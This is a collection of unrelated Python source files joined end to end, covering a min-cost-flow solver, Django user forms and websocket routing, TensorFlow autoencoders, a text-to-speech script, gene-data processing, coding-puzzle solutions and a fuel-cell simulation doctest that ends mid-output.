from dev_misc import Map
def min_cost_flow(dists, demand, n_similar=None, capacity=1):
'''
Modified from https://developers.google.com/optimization/flow/mincostflow.
``capacity`` controls how many lost tokens can be mapped to the same known token.
If it is set to -1, then there is no constraint at all, otherwise use its value.
'''
logging.debug('Solving flow')
dists = (dists * 100.0).astype('int64')
max_demand = min(dists.shape[0], dists.shape[1])
if demand > max_demand:
logging.warning('demand too big, set to %d instead' % (max_demand))
demand = max_demand
# between each pair. For instance, the arc from node 0 to node 1 has a
# capacity of 15 and a unit cost of 4.
nt, ns = dists.shape
start_nodes = list()
end_nodes = list()
unit_costs = list()
capacities = list()
# source to c_t
for t in range(nt):
start_nodes.append(0)
end_nodes.append(t + 2) # NOTE 0 is reserved for source, and 1 for sink
unit_costs.append(0)
capacities.append(1)
# c_s to sink
for s in range(ns):
start_nodes.append(s + 2 + nt)
end_nodes.append(1)
unit_costs.append(0)
if capacity == -1:
capacities.append(nt + ns) # NOTE Ignore capacity constraint.
else:
capacities.append(capacity)
# c_t to c_s
if n_similar: # and False:
idx = dists.argpartition(n_similar - 1, axis=1)[:, :n_similar]
all_words = set()
for t in range(nt):
all_s = idx[t]
all_words.update(all_s)
# for s in all_s:
# start_nodes.append(t + 2)
# end_nodes.append(s + 2 + nt)
# unit_costs.append(dists[t, s])
if len(all_words) < demand:
logging.warning('pruned too many words, adding some more')
added = random.sample(set(range(ns)) - all_words, demand - len(all_words))
all_words.update(added)
# for s in added:
# for t in range(nt):
# start_nodes.append(t + 2)
# end_nodes.append(s + 2 + nt)
# unit_costs.append(dists[t, s])
for t, s in itertools.product(range(nt), all_words):
start_nodes.append(t + 2)
end_nodes.append(s + 2 + nt)
unit_costs.append(dists[t, s])
capacities.append(1)
else:
for t, s in itertools.product(range(nt), range(ns)):
start_nodes.append(t + 2)
end_nodes.append(s + 2 + nt)
unit_costs.append(dists[t, s])
capacities.append(1)
# Define an array of supplies at each node.
supplies = [demand, -demand] # + [0] * (nt + ns)
# Instantiate a SimpleMinCostFlow solver.
min_cost_flow = pywrapgraph.SimpleMinCostFlow()
# Add each arc.
for i in range(0, len(start_nodes)):
min_cost_flow.AddArcWithCapacityAndUnitCost(
int(start_nodes[i]),
int(end_nodes[i]),
int(capacities[i]),
int(unit_costs[i]))
# Add node supplies.
for i in range(0, len(supplies)):
min_cost_flow.SetNodeSupply(i, supplies[i])
# Find the minimum cost flow between node 0 and node 4.
if min_cost_flow.Solve() == min_cost_flow.OPTIMAL:
cost = min_cost_flow.OptimalCost()
flow = np.zeros([nt, ns])
for i in range(min_cost_flow.NumArcs()):
t = min_cost_flow.Tail(i)
s = min_cost_flow.Head(i)
if t > 1 and s > 1 + nt:
flow[t - 2, s - 2 - nt] = min_cost_flow.Flow(i)
return flow, cost
else:
logging.error('There was an issue with the min cost flow input.')
raise RuntimeError('Min cost flow solver error')
|
import sys
sys.stdin = open('도약.txt')
N = int(input())
leaf = []
for i in range(N):
leaf.append(int(input()))
leaf.sort()
print(leaf)
for i in range(N):
|
# -*- coding: utf-8 -*-
from itertools import combinations
n = int(raw_input())
ranks = sorted(map(int, raw_input().split(' ')))
diff = ranks[n - 1] - ranks[0]
has_next_iteration = True
left_pointer = 0
right_pointer = n - 1
if diff != 0:
count = len(filter(lambda x: x == ranks[n - 1], ranks)) * len(
filter(lambda x: x == ranks[0], ranks))
else:
count = len(list(combinations(ranks, 2)))
print('{} {}'.format(diff, count))
|
class Solution:
def isIsomorphic(self, s: str, t: str) -> bool:
return list(map(s.find,s)) == list(map(t.find,t)) |
from django import forms
from .models import User, Profile
from django.contrib.auth import authenticate
from django.contrib.auth.forms import ReadOnlyPasswordHashField
from django.contrib.auth.models import Group
from crispy_forms.helper import FormHelper
#Form to add user detail for registration
class AddUserForm(forms.ModelForm):
# method to make sure that the label is not shown in the template form field
def __init__(self, *args, **kwargs):
super(AddUserForm, self).__init__(*args, **kwargs)
self.helper = FormHelper()
self.helper.form_show_labels = False
"""
New User Form. Requires password confirmation.
"""
full_name = forms.CharField(widget=forms.TextInput(
attrs={'class': 'form-control','type':'text','name': 'full_name','placeholder':'Full Name'}),
label='')
email = forms.EmailField(widget=forms.TextInput(
attrs={'class': 'form-control','type':'text','name': 'email','placeholder':'Email'}),
label='')
password1 = forms.CharField(widget=forms.PasswordInput(
attrs={'class':'form-control','type':'password', 'name': 'password','placeholder':'Password'}),
label='')
password2 = forms.CharField(widget=forms.PasswordInput(
attrs={'class':'form-control','type':'password', 'name': 'password','placeholder':'Comfirm password'}),
label='')
# group = forms.ModelChoiceField(queryset=Group.objects.filter(name='Student'), required=True) #getting the groups from admin as a choice field
class Meta:
model = User
fields = ['email', 'full_name']
# to make sure the password and the confirm password are equal
def clean_password2(self):
# Check that the two password entries match
password1 = self.cleaned_data.get("password1")
password2 = self.cleaned_data.get("password2")
if password1 and password2 and password1 != password2:
raise forms.ValidationError("Passwords do not match")
return password2
# to make sure the added detail of the user in form is saved in database
def save(self, commit=True):
# Save the provided password in hashed format
user = super().save(commit=False)
user.set_password(self.cleaned_data["password1"])
if commit:
user.save()
# user.groups.add(self.cleaned_data['group']) # saving the user to the group as per thie choice.
return user
# This form is use if the user wants to make changes to the registered detail
class UpdateUserForm(forms.ModelForm):
email = forms.EmailField()
class Meta:
model = User
fields = ['email', 'full_name']
# Password can't be changed in the admin
def clean_password(self):
return self.initial["password"]
# this form is use to show the login form to the user
class LoginForm(forms.Form):
email = forms.EmailField(widget=forms.TextInput(
attrs={'class': 'form-control','type':'text','name': 'email','placeholder':'Email'}),
label='')
password = forms.CharField(widget=forms.PasswordInput(
attrs={'class':'form-control','type':'password', 'name': 'password','placeholder':'Password'}),
label='')
class Meta:
fields = ['email', 'password']
# this method is use to sure that the information matches the database information. if not it raises an error
def clean(self, *args, **kwargs):
email = self.cleaned_data.get("email")
password = self.cleaned_data.get("password")
if email and password:
user = authenticate(email=email, password=password)
if not user:
raise forms.ValidationError("User does not exist")
return super(LoginForm, self).clean(*args, **kwargs)
# this form is created for the user to edit their profile
class ProfileForm(forms.ModelForm):
class Meta:
model = Profile
fields = ['profile_img', 'phone_number', 'address', 'gender', 'about'] |
from sklearn import cluster
from sklearn.decomposition import PCA
import numpy as np
from infogan.misc.datasets import DataFolder
import matplotlib.pyplot as plt
import tensorflow as tf
import datetime
import os
from launchers.discriminatorTest import trainsetTransform, clusterLabeling
from traditionalClusteringTests.dataUtils import OneHotToInt, showDimRed, \
showResults
def stringNow():
now = datetime.datetime.now()
return now.strftime('%Y_%m_%d-%H_%M_%S')
class AbstractUnsupModel(object):
def __init__(self,dataset):
self.dataset=dataset
self.batchSize =dataset.batch_size
self.imageShape = dataset.image_shape
self.inputSizeFlatten = reduce(lambda x,y : x*y, self.imageShape)
def train(self):
raise NotImplementedError()
def getLatentRepresentation(self,imageBatch):
raise NotImplementedError()
def reconstruction(self, imageBatch):
raise NotImplementedError()
def evaluate(self,outName,show = 3,nClustersTofind=3):
outImageShape = self.imageShape[:-1] if (len(self.imageShape) == 3 and self.imageShape[2] == 1) else self.imageShape
images, labeles = self.dataset.next_batch(self.batchSize)
batchRecons = self.reconstruction(images)
# Check dataset format (min - max values)
minDataset = images.min()
maxDataset = images.max()
# Check reconstruction format (min - max values)
minRec = batchRecons.min()
maxRec = batchRecons.max()
formatImageDataset = lambda x : x
formatImageRec = lambda x : x
if (minDataset < 0 or maxDataset > 1):
formatImageDataset = lambda image: (image - minDataset) / (maxDataset-minDataset)
print("Dataset image not in 0-1 range. Range ({0} / {1})".format(minDataset,maxDataset))
if (minRec < 0 or maxRec > 1):
formatImageRec = lambda image: (image - minRec) / (maxRec-minRec)
print("Rec image not in 0-1 range. Range ({0} / {1})".format(minRec,maxRec))
for i in range(show):
original = images[i].reshape(outImageShape)
recon = batchRecons[i].reshape(outImageShape)
plt.figure('original')
plt.imshow(formatImageDataset(original))
plt.figure('Reconstruction')
plt.imshow(formatImageRec(recon))
plt.show()
transformName = outName
labNames={}
showBlokeh=True
# Definir transformacion como activaciones en salida encoder
transfFun = lambda x: self.getLatentRepresentation(x)
# Tomar activaciones
trainX, rlbs = trainsetTransform(transfFun, self.dataset)
rlbs = OneHotToInt(rlbs)
# Crear carpeta de resultados
if not os.path.exists(outName):
os.makedirs(outName)
# Mostrar labels reales con PCA 2
pca = PCA(n_components=2)
transformed = showDimRed(trainX, rlbs, 'latentRep PCA_Real',
pca, outName)
kmeans = cluster.KMeans(n_clusters=nClustersTofind)
spectral = cluster.SpectralClustering(n_clusters=nClustersTofind,
eigen_solver='arpack',
affinity="nearest_neighbors")
algorithms = [kmeans,spectral]
for clusterAlg in algorithms:
# Categorizar con K means o spectral
points, predClust, realsLab = clusterLabeling(self.dataset,
transfFun, clusterAlg,
trainX)
name = clusterAlg.__class__.__name__
print "Showing results for Cluster ", name
showResults(self.dataset, points, predClust, np.array(realsLab),
transformName + " " + 'Cluster ' + str(name), outName,
labelNames=labNames)
def checkSessionDecorator(func):
def func_wrapper(*args, **kwargs):
#args[0] should be self
assert(args[0].activeSession),'No active session'
return func(*args, **kwargs)
return func_wrapper
class AutoencoderVanilla(AbstractUnsupModel):
"""
Example of use
with AutoencoderVanilla() as autoencoder:
autoencoder.train()
autoencoder.evaluate()
The with is needed to start and end the tensorflow session
"""
def __init__(self, datasetObject, iterations=1000, units=100, learningRate=0.01):
super(AutoencoderVanilla, self).__init__(datasetObject)
self.logsDir = 'autoencodersVanilla'
self.iterations = iterations
self.activeSession = None
self.units=units
self.learningRate=learningRate
def defArch(self):
self.inputBatch = tf.placeholder(tf.float32, (self.batchSize, self.imageShape[0], self.imageShape[1], self.imageShape[2]), 'input')
flattenInput = tf.reshape(self.inputBatch, (self.batchSize, self.inputSizeFlatten), name='flattenInput')
enc1 = tf.contrib.layers.fully_connected(flattenInput,
self.units*2,
activation_fn=tf.nn.relu)
enc2 = tf.contrib.layers.fully_connected(enc1, self.units, activation_fn=tf.nn.relu)
self.hiddenLayer = tf.contrib.layers.fully_connected(enc2, 20, activation_fn=tf.nn.relu)
dec1 = tf.contrib.layers.fully_connected(self.hiddenLayer, self.units, activation_fn=tf.nn.relu)
dec2 = tf.contrib.layers.fully_connected(dec1, self.units*2,activation_fn=tf.nn.relu)
self.reconstructionLayer = tf.contrib.layers.fully_connected(dec2, self.inputSizeFlatten, activation_fn=tf.nn.tanh)
self.reconError = tf.losses.mean_squared_error(flattenInput, self.reconstructionLayer)
self.train_step = tf.train.AdamOptimizer(self.learningRate).minimize(self.reconError)
tf.summary.scalar('ReconstructionError', self.reconError)
pass
@checkSessionDecorator
def getLatentRepresentation(self,x):
return self.activeSession.run(self.hiddenLayer, feed_dict={self.inputBatch: x})
def __enter__(self):
tf.reset_default_graph()
# Initialize
self.defArch()
self.activeSession = tf.InteractiveSession()
tf.global_variables_initializer().run()
self.merged = tf.summary.merge_all()
modelPath = os.path.join('logs',self.logsDir, stringNow(), 'train')
self.train_writer = tf.summary.FileWriter(modelPath, self.activeSession.graph)
self.val_writer = tf.summary.FileWriter(os.path.join('logs',self.logsDir, stringNow(), 'val'), self.activeSession.graph)
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.activeSession.close()
pass
@checkSessionDecorator
def train(self):
for i in range(self.iterations):
if i % 30 == 0: # Record summaries and test-set accuracy
images, labels = self.dataset.next_batch(self.batchSize, 'val')
summary, error = self.activeSession.run([self.merged, self.reconError], feed_dict={self.inputBatch: images})
print('Iteration {1} reconstruction Error {0} '.format(error, i))
self.val_writer.add_summary(summary, i)
else: # Record train set summaries, and train
images, labels = self.dataset.next_batch(self.batchSize, 'train')
summary, _ = self.activeSession.run([self.merged, self.train_step], feed_dict={self.inputBatch: images})
self.train_writer.add_summary(summary, i)
self.train_writer.close()
self.val_writer.close()
@checkSessionDecorator
def reconstruction(self, imageBatch):
return self.activeSession.run(self.reconstructionLayer, feed_dict={self.inputBatch: imageBatch})
class ConvAutoencoder(AutoencoderVanilla):
def __init__(self, datasetObject, iterations=1000, units=32, learningRate=0.01):
super(ConvAutoencoder, self).__init__(datasetObject,iterations=iterations, units=units, learningRate=learningRate)
self.logsDir = 'ConvAutoencoder'
@checkSessionDecorator
def getLatentRepresentation(self,x):
return self.activeSession.run(tf.reduce_mean(self.hiddenRep,axis=[1,2]), feed_dict={self.inputBatch: x})
def defArch(self):
self.inputBatch = tf.placeholder(tf.float32, (self.batchSize, self.imageShape[0], self.imageShape[1], self.imageShape[2]), 'input')
# Encoder
conv1 = tf.layers.conv2d(inputs=self.inputBatch,filters=self.units*2,kernel_size=[3, 3],padding="same",strides=(2,2),
activation=tf.nn.relu,name='Conv1',kernel_initializer=tf.contrib.layers.xavier_initializer())
conv2 = tf.layers.conv2d(inputs=conv1,filters=self.units,kernel_size=[4, 4],padding="same",strides=(2,2),
activation=tf.nn.relu,name='Conv2',kernel_initializer=tf.contrib.layers.xavier_initializer())
self.outEncoder = conv2
self.hiddenRep = tf.layers.conv2d(inputs=self.outEncoder, filters=20, kernel_size=[5, 5], padding="same",strides=(1,1),
activation=tf.nn.relu, name='HidenRep',kernel_initializer=tf.contrib.layers.xavier_initializer())
# Decoder
convT1 = tf.layers.conv2d_transpose(self.hiddenRep, self.units, kernel_size=[4, 4], strides=(2, 2), padding='same',
activation=tf.nn.relu, name='convT1',kernel_initializer=tf.contrib.layers.xavier_initializer())
convT2 = tf.layers.conv2d_transpose(convT1, self.units*2, kernel_size=[3, 3], strides=(2, 2), padding='same',
activation=tf.nn.relu, name='convT2',kernel_initializer=tf.contrib.layers.xavier_initializer())
outDecoder = convT2
self.reconstructionLayer = tf.layers.conv2d_transpose(outDecoder,self.inputBatch.shape[3],
kernel_size=[3, 3],strides=(1, 1),padding='same',
activation=tf.nn.tanh,kernel_initializer=tf.contrib.layers.xavier_initializer(),
name='Recons')
self.reconError = tf.losses.mean_squared_error(self.inputBatch, self.reconstructionLayer)
self.train_step = tf.train.AdamOptimizer(self.learningRate).minimize(self.reconError)
tf.summary.scalar('ReconstructionError', self.reconError)
pass
#CONV AE
# SPARSE AE
# VAE
|
import sys
import time
import queue
import threading
from playsound import playsound
speechQ = queue.Queue()
lineQ = queue.Queue()
# Possible list of available voices for actors
voiceMap = {'auA':'en-AU-Wavenet-A', 'auB':'en-AU-Wavenet-B', 'auC':'en-AU-Wavenet-C',
'auD':'en-AU-Wavenet-D', 'gbA':'en-GB-Wavenet-A','gbB':'en-GB-Wavenet-B',
'gbC':'en-GB-Wavenet-C', 'gbD':'en-GB-Wavenet-D', 'usA':'en-US-Wavenet-A',
'usB':'en-US-Wavenet-B', 'usC':'en-US-Wavenet-C', 'usD':'en-US-Wavenet-D',
'usE':'en-US-Wavenet-E', 'usF':'en-US-Wavenet-F'}
class Actor:
""" An actor for a given play that is designed
to speak mp3 sound files of lines.
"""
def __init__(self, actorId=None, voice=None):
""" Initializer for an actor
Args:
actorId: The string name of the actor
voice: The voice associated with the actor
"""
global speechQ
self.speechQ = speechQ
self.Id = actorId
self.voice = voice
self.lineQ = lineQ
self.thread = threading.Thread(target=self.run, name="Actor", args=[])
self.thread.start()
self.lineNum = 0
def synthesize_ssml(self, text):
"""Synthesizes speech from the input string of ssml.
Note: ssml must be well-formed according to:
https://www.w3.org/TR/speech-synthesis/
Example: <speak>Hello there.</speak>
"""
from google.cloud import texttospeech
client = texttospeech.TextToSpeechClient()
ssml = "<speak>" + text + "</speak>"
input_text = texttospeech.types.SynthesisInput(ssml=ssml)
# Note: the voice can also be specified by name.
# Names of voices can be retrieved with client.list_voices().
voice = texttospeech.types.VoiceSelectionParams(
language_code='en-US',
ssml_gender=texttospeech.enums.SsmlVoiceGender.MALE,
name=self.voice)
# Set the output and speaking rate
audio_config = texttospeech.types.AudioConfig(
audio_encoding=texttospeech.enums.AudioEncoding.MP3,
speaking_rate=0.8)
response = client.synthesize_speech(input_text, voice, audio_config)
# The response's audio_content is binary.
file = "audio_line" + str(self.Id) + str(self.lineNum) + ".mp3"
with open(file, 'wb') as out:
out.write(response.audio_content)
print('Audio content written to file', file)
self.lineQ.put(file)
self.lineNum += 1
def parseText(self, text):
""" Further parsing done to ensure
proper breaks in speech given a line
"""
line = ""
sentiment = 1
for word in text.split():
print("word", word)
if word[-1] == ".":
word = word + "<break time=\"" + str(
700 * sentiment) + "ms\" />"
elif word[-1] == ",":
word = word + "<break time=\"450ms\" />"
elif word[-1] == ":":
word = word + "<break time=\"250ms\" />"
word += " "
line += word
print("text", text, "line", line)
return line
def run(self):
""" Listening process
for an actor.
"""
while True:
line = speechQ.get()
if line is None:
break
if type(line) is not str:
line = ''.join(map(chr,line))
print(f"Actor {self.Id} has picked up line {line}")
line = self.parseText(line)
self.synthesize_ssml(line)
def start(actorId, voice):
""" Starts an instance of an actor
Args:
actorId: A string associated name for the actor
voice: Wavenet voice for the actor
"""
if type(actorId) is not str:
print("Not string")
actorId = ''.join(map(chr,actorId)) # Erlang message formatting
voice = ''.join(map(chr,voice))
voice = voiceMap[voice]
a = Actor(actorId=actorId, voice=voice)
def enqueue(line):
""" Enqueues a line for an actor"""
print(f"line is {line}")
speechQ.put(line[0])
def speak():
""" Cues an actor to speak the next
line
"""
print("Speaking")
file = lineQ.get()
playsound(file)
|
from django import forms
from pagedown.widgets import AdminPagedownWidget
from .models import Post
from taggit.forms import *
class BlogCreationForm(forms.ModelForm):
content = forms.CharField(widget=AdminPagedownWidget())
class Meta:
model = Post
fields = [
'content',
'title',
'tags'
]
|
#setup.py
import csv
from os import walk
#This is the big datafile
case_file = open("Cases/CaseData1.tsv")
CFILE_FRONT = "Cases/CaseData"
#Gene expression datafile
tsv_file = open("Expression/CosmicCompleteGeneExpression_1.tsv")
EFILE_FRONT = "Expression/CosmicCompleteGeneExpression_"
FILE_EXT = ".tsv"
expression_data = csv.reader(tsv_file, delimiter="\t")
case_data = csv.reader(case_file, delimiter="\t")
collected_data = []
NUM_EFILES = 3242
NUM_CFILES = 176#176
onFile = 1
onEFile = 1
onCFile = 1
onGene = 0
onRow = 0
GENE_NAMES = []
FIELDNAMES = ["Gene_name", "Accession Number", "Gene_CDS_length", "HGNC_ID", "Sample_name", "ID_sample", "ID_tumour", "Primary_site", "Site_subtype_1", "Site_subtype_2", "Site_subtype_3", "Primary_histology", "Histology_subtype_1", "Histology_subtype_2", "Histology_subtype_3", "Genome-wide_screen", "GENOMIC_MUTATION_ID", "LEGACY_MUTATION_ID", "MUTATION_ID", "Mutation_CDS", "Mutation_AA", "Mutation_Description", "Mutation_zygosity", "LOH", "GRCh", "Mutation_genome_position", "Mutation_strand", "SNP", "Resistance_Mutation", "FATHMM_prediction", "FATHMM_score", "Mutation_somatic_status", "Pubmed_PMID", "ID_STUDY", "Sample_Type", "Tumour_origin", "Age", "HGVSP", "HGVSC", "HGVSG", "SAMPLE_ID2", "SAMPLE_NAME2", "GENE_NAME2", "REGULATION2", "Z_SCORE2", "ID_STUDY2"]
have_genes = []
numGenes = -1
#geneNames = {"NULL": -1}
genes = {}
genesTemp = []
outPath = "allPatients"
patient_data = {}
patients = []
patientFiles = {}
def addToFile (file, row):
global FIELDNAMES
writer = csv.DictWriter(file, fieldnames=FIELDNAMES, delimiter='\t')
tempRowDict = {}
for k in range(len(row)):
tempRowDict.update({FIELDNAMES[k]: row[k]})
pass
writer.writerow(tempRowDict)
while onCFile <= NUM_CFILES:
print ("***********" + str(onCFile) + "***********")
case_file = open("Cases/CaseData" + str(onCFile) + ".tsv")
case_data = csv.reader(case_file, delimiter="\t")
onCFile += 1
for c_row in case_data:
#if "TP53" in c_row[0]:
#pN = c_row[20]
#print(c_row[20])
#tempPat = "p." + pattern
if c_row[4] in patients:
#print("Pattern Found")
temp = [c_row]
patients.append(c_row[4])
patient_data.update({c_row[4]: temp})
f = open(outPath + "/" + c_row[4] +".tsv", "w+")
patientFiles.update({c_row[4]: f})
case_file.close()
#print(patient_data)
pass
#READ EXPRESSION DATA
while onEFile <= NUM_EFILES:
print ("~~~~~~~~~~~" + str(onEFile) + "~~~~~~~~~~~")
for p in patients:
patientFiles[p] = open(patientFiles[p].name, "a")
tsv_file = open(EFILE_FRONT + str(onEFile) + ".tsv")
onEFile += 1
expression_data = csv.reader(tsv_file, delimiter="\t")
for e_row in expression_data:
if e_row[1] in patient_data:
addToFile(patientFiles[e_row[1]], e_row)
pass
for p in patients:
patientFiles[p].close()
pass
print (patientFiles)
onCFile = 1
while onCFile <= NUM_CFILES:
print ("***********" + str(onCFile) + "***********")
case_file = open("Cases/CaseData" + str(onCFile) + ".tsv")
case_data = csv.reader(case_file, delimiter="\t")
onCFile += 1
for p in patients:
patientFiles[p] = open(patientFiles[p].name, "a")
if onCFile == 2:
pass
#addToFile(patientFiles[p], FIELDNAMES)
for c_row in case_data:
if c_row[4] in patients:
addToFile(patientFiles[c_row[4]], c_row)
for p in patients:
patientFiles[p].close()
#print(patient_data)
pass
#######################################################################
#.....................................................................#
#....................SEPARATE FILES...................................#
#.....................................................................#
#######################################################################
filepath = outPath
out_path = "e/"
out_path_2 = "m/"
original_files = []
FIELDNAMES = ["COSMIC ID", "TCGA ID", "GENE", "EXPRESSION", "Z VALUE", "?"]
FIELDNAMES2 = ["Gene_name", "Accession Number", "Gene_CDS_length", "HGNC_ID", "Sample_name", "ID_sample", "ID_tumour", "Primary_site", "Site_subtype_1", "Site_subtype_2", "Site_subtype_3", "Primary_histology", "Histology_subtype_1", "Histology_subtype_2", "Histology_subtype_3", "Genome-wide_screen", "GENOMIC_MUTATION_ID", "LEGACY_MUTATION_ID", "MUTATION_ID", "Mutation_CDS", "Mutation_AA", "Mutation_Description", "Mutation_zygosity", "LOH", "GRCh", "Mutation_genome_position", "Mutation_strand", "SNP", "Resistance_Mutation", "FATHMM_prediction", "FATHMM_score", "Mutation_somatic_status", "Pubmed_PMID", "ID_STUDY", "Sample_Type", "Tumour_origin", "Age", "HGVSP", "HGVSC", "HGVSG", "SAMPLE_ID2", "SAMPLE_NAME2", "GENE_NAME2", "REGULATION2", "Z_SCORE2", "ID_STUDY2"]
for (dirpath, dirnames, filenames) in walk(filepath):
original_files.extend(filenames)
break
for n in original_files:
#print("opening", n[:len(n)-4] + "...")
og_file = open(filepath + "/" + n)
#print ("create", n, "expression file")
expression_file = open(out_path + n[:len(n)-4] + ".gx.tsv", "w+")
og_data = csv.reader(og_file, delimiter="\t")
nonNormalExpression = []
mutData = []
for row in og_data:
if row == [] or row[4] == n[:len(n)-4] or row[4] == "Sample_name":
mutData.append(row[:])
elif row[3] != "normal":
r = row[:]
if r[3] != "over":
r[2] = r[2] + "+"
else:
r[2] = r[2] + "-"
nonNormalExpression.append(r[:])
else:
nonNormalExpression.append(r[:])
pass
#write to GX file
writer = csv.DictWriter(expression_file, fieldnames=FIELDNAMES, delimiter='\t')
for r in nonNormalExpression:
tempRowDict = {}
for k in range(len(r)):
if k > 5:
break
tempRowDict.update({FIELDNAMES[k]: r[k]})
pass
writer.writerow(tempRowDict)
#
expression_file.close()
og_file.close()
#print ("create", n, "mutation file")
mutation_file = open(out_path_2 + n[:len(n)-4] + ".mu.tsv", "w+")
writer = csv.DictWriter(mutation_file, fieldnames=FIELDNAMES2, delimiter='\t')
for r in mutData:
tempRowDict = {}
for k in range(len(r)):
tempRowDict.update({FIELDNAMES2[k]: r[k]})
pass
writer.writerow(tempRowDict)
#
mutation_file.close()
pass
pass
|
'''
Given a binary tree, find the lowest common ancestor (LCA) of two given nodes in the tree.
According to the definition of LCA on Wikipedia: The lowest common ancestor is defined between two nodes p and q as the lowest node in T that has both p and q as descendants (where we allow a node to be a descendant of itself)
Given the following binary tree: root = [3,5,1,6,2,0,8,null,null,7,4]
_______3______
/ \
___5__ ___1__
/ \ / \
6 _2 0 8
/ \
7 4
Example 1:
Input: root = [3,5,1,6,2,0,8,null,null,7,4], p = 5, q = 1
Output: 3
Explanation: The LCA of nodes 5 and 1 is 3.
Example 2:
Input: root = [3,5,1,6,2,0,8,null,null,7,4], p = 5, q = 4
Output: 5
Explanation: The LCA of nodes 5 and 4 is 5, since a node can be a descendant of itself
according to the LCA definition.
Note:
All of the nodes' values will be unique.
p and q are different and both values will exist in the binary tree
'''
import copy
# Definition for a binary tree node.
class TreeNode(object):
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution(object):
def lowestCommonAncestor(self, root, p, q):
"""
:type root: TreeNode
:type p: TreeNode
:type q: TreeNode
:rtype: TreeNode
"""
if root == None:
return None
ok,pseq = self.dfs(root,[],p)
ok,qseq = self.dfs(root,[],q)
if len(pseq)>len(qseq):
pseq,qseq=qseq,pseq
for i in range (1,len(pseq)):
if pseq[i]!=qseq[i]:
return pseq[i-1]
if len(qseq)>len(pseq):
return qseq[len(pseq)-1]
return None
def dfs(self,root,seq,target):
if root == None:
return False,None
seq.append(root)
if root == target:
# 跟go不同,没有指针;seq的copy只能靠返回值,不能靠形参;幸好python支持多个返回值
return True,copy.copy(seq)
ok,ans = self.dfs(root.left,seq,target)
if ok:
return True,ans
ok,ans = self.dfs(root.right,seq,target)
if ok:
return True,ans
# 跟go不同;python slice 如果想缩容,需要使用内置方法,slice是原来序列的拷贝
seq.remove(seq[-1])
return False,None
s = [1,2,3,4,5,6]
s.append(99)
s.append(98)
s = s[:-1]
s[1]=10
print s,s
def modifyseq(seq,seq2):
seq2 = copy.copy(seq)
#函数内对形参做修改是没有用的,ide提示了,说是local variable
x = []
modifyseq(s,x)
print x |
from Population import Population
from Data import Reader
seed = 1
data = Reader()
num_problem = 0
population = Population(seed, 3, 5, data.problems, data.rooms[num_problem], data.courses[num_problem], data.days[num_problem], data.curricula[num_problem], data.periods_per_day[num_problem], data.num_rooms[num_problem], 10, 10)
count = 0
while count < 1:
population.nextGeneration()
count = count + 1
print(" ----- GENERATION PHASE COMPLETED ----- ")
population.evolvePerturbativeHeuristic()
population.createForGHP(1)
population.evaluateGHP()
# num_permutations = 20
# for i in range(0, num_permutations):
# population.hillClimb()
|
'''
Technique of neagtion is used in this, as we move in the array, we make the number present at the index
equal to the current number we at, and just return index+1 of the positive number present in array after
traversing the array
'''
def finidingdisappearednumbers(self,nums):
for i in range(len(nums)):
index = abs(nums[i])
nums[index] = -abs(nums[index])
return [i+1 for i in range(len(nums)) if nums[i]>0] |
from django.conf.urls import url
from django.urls import path
from channels.routing import ProtocolTypeRouter, URLRouter, ChannelNameRouter
from channels.auth import AuthMiddlewareStack
from channels.security.websocket import AllowedHostsOriginValidator, OriginValidator
from game.consumers import GameConsumer
application = ProtocolTypeRouter({
# Empty for now
'websocket': AllowedHostsOriginValidator(
AuthMiddlewareStack(
URLRouter(
[
#url(r"", GameConsumer, name='game-consumer')
path('<int:game_id>/details/', GameConsumer, name='game-detail-consumer'),
#path('about/', views.about, name='game-about'),
#path('', views.home, name='game-home'),
#path('<int:game_id>/next/', views.game_next, name='game-next'),
#path('<int:game_id>/pick/', views.pick, name='game-pick'),
#path('<int:game_id>/join/', views.join, name='game-join'),
#path('<int:game_id>/ready/', views.ready, name='game-ready'),
]
)
),
),
# burasi degismesi lazim
#'channel': ChannelNameRouter({
# 'task': TaskConsumer
#})
}) |
# -*- coding: utf-8 -*-
'''
>>> from opem.Dynamic.Padulles_Amphlett import *
>>> import shutil
>>> Test_Vector={"A":50.6,"l":0.0178,"lambda":23,"JMax":1.5,"T":343,"N0":5,"KO2":0.0000211,"KH2":0.0000422,"KH2O":0.000007716,"tH2":3.37,"tO2":6.74,"t1":2,"t2":2,"tH2O":18.418,"B":0.016,"rho":1.168,"qMethanol":0.0002,"CV":2,"i-start":0.1,"i-stop":4,"i-step":0.1,"Name":"Test"}
>>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod=Test_Vector, TestMode=True)
###########
Padulles-Amphlett-Model Simulation
###########
Analyzing . . .
I : 0.1
E : 6.0684154992732005 V
Eta Activation : 0.18557231242539243 V
Eta Concentration : 2.109426805213159e-05 V
Eta Ohmic : 0.00017548304819292376 V
FC Efficiency : 0.6589193654570529
FC Power : 0.5139571050565013 W
FC Voltage : 5.139571050565013 V
Loss : 0.1857688897416375 V
PH2 : 0.19717074233280188 atm
PH2O : 0.2426831613626925 atm
PO2 : 0.1906263686382979 atm
Power-Thermal : 0.10104289494349877 W
###########
I : 0.2
E : 6.068413961701556 V
Eta Activation : 0.23146009851376736 V
Eta Concentration : 4.221638333089875e-05 V
Eta Ohmic : 0.0003510800160998837 V
FC Efficiency : 0.629377818863534
FC Power : 0.9818293974271133 W
FC Voltage : 4.909146987135566 V
Loss : 0.23185339491319815 V
PH2 : 0.1971566919511875 atm
PH2O : 0.24266586776736396 atm
PO2 : 0.1906184358000996 atm
Power-Thermal : 0.2481706025728869 W
###########
I : 0.3
E : 6.068412424065923 V
Eta Activation : 0.2583036192079603 V
Eta Concentration : 6.336641945755048e-05 V
Eta Ohmic : 0.0005267910327125488 V
FC Efficiency : 0.6120440436878553
FC Power : 1.4321830622295815 W
FC Voltage : 4.773943540765272 V
Loss : 0.25889377666013036 V
PH2 : 0.19714264156957312 atm
PH2O : 0.24264857417203542 atm
PO2 : 0.1906105029619013 atm
Power-Thermal : 0.41281693777041856 W
###########
I : 0.4
E : 6.068410886366294 V
Eta Activation : 0.27735002084480426 V
Eta Concentration : 8.454445034568427e-05 V
Eta Ohmic : 0.0007026162388380664 V
FC Efficiency : 0.5997083306020967
FC Power : 1.871089991478542 W
FC Voltage : 4.677724978696355 V
Loss : 0.278137181533988 V
PH2 : 0.19712859118795872 atm
PH2O : 0.24263128057670688 atm
PO2 : 0.19060257012370302 atm
Power-Thermal : 0.5889100085214584 W
###########
I : 0.5
E : 6.068409348602667 V
Eta Activation : 0.2921240370409447 V
Eta Concentration : 0.00010575055020278165 V
Eta Ohmic : 0.0008785557847524419 V
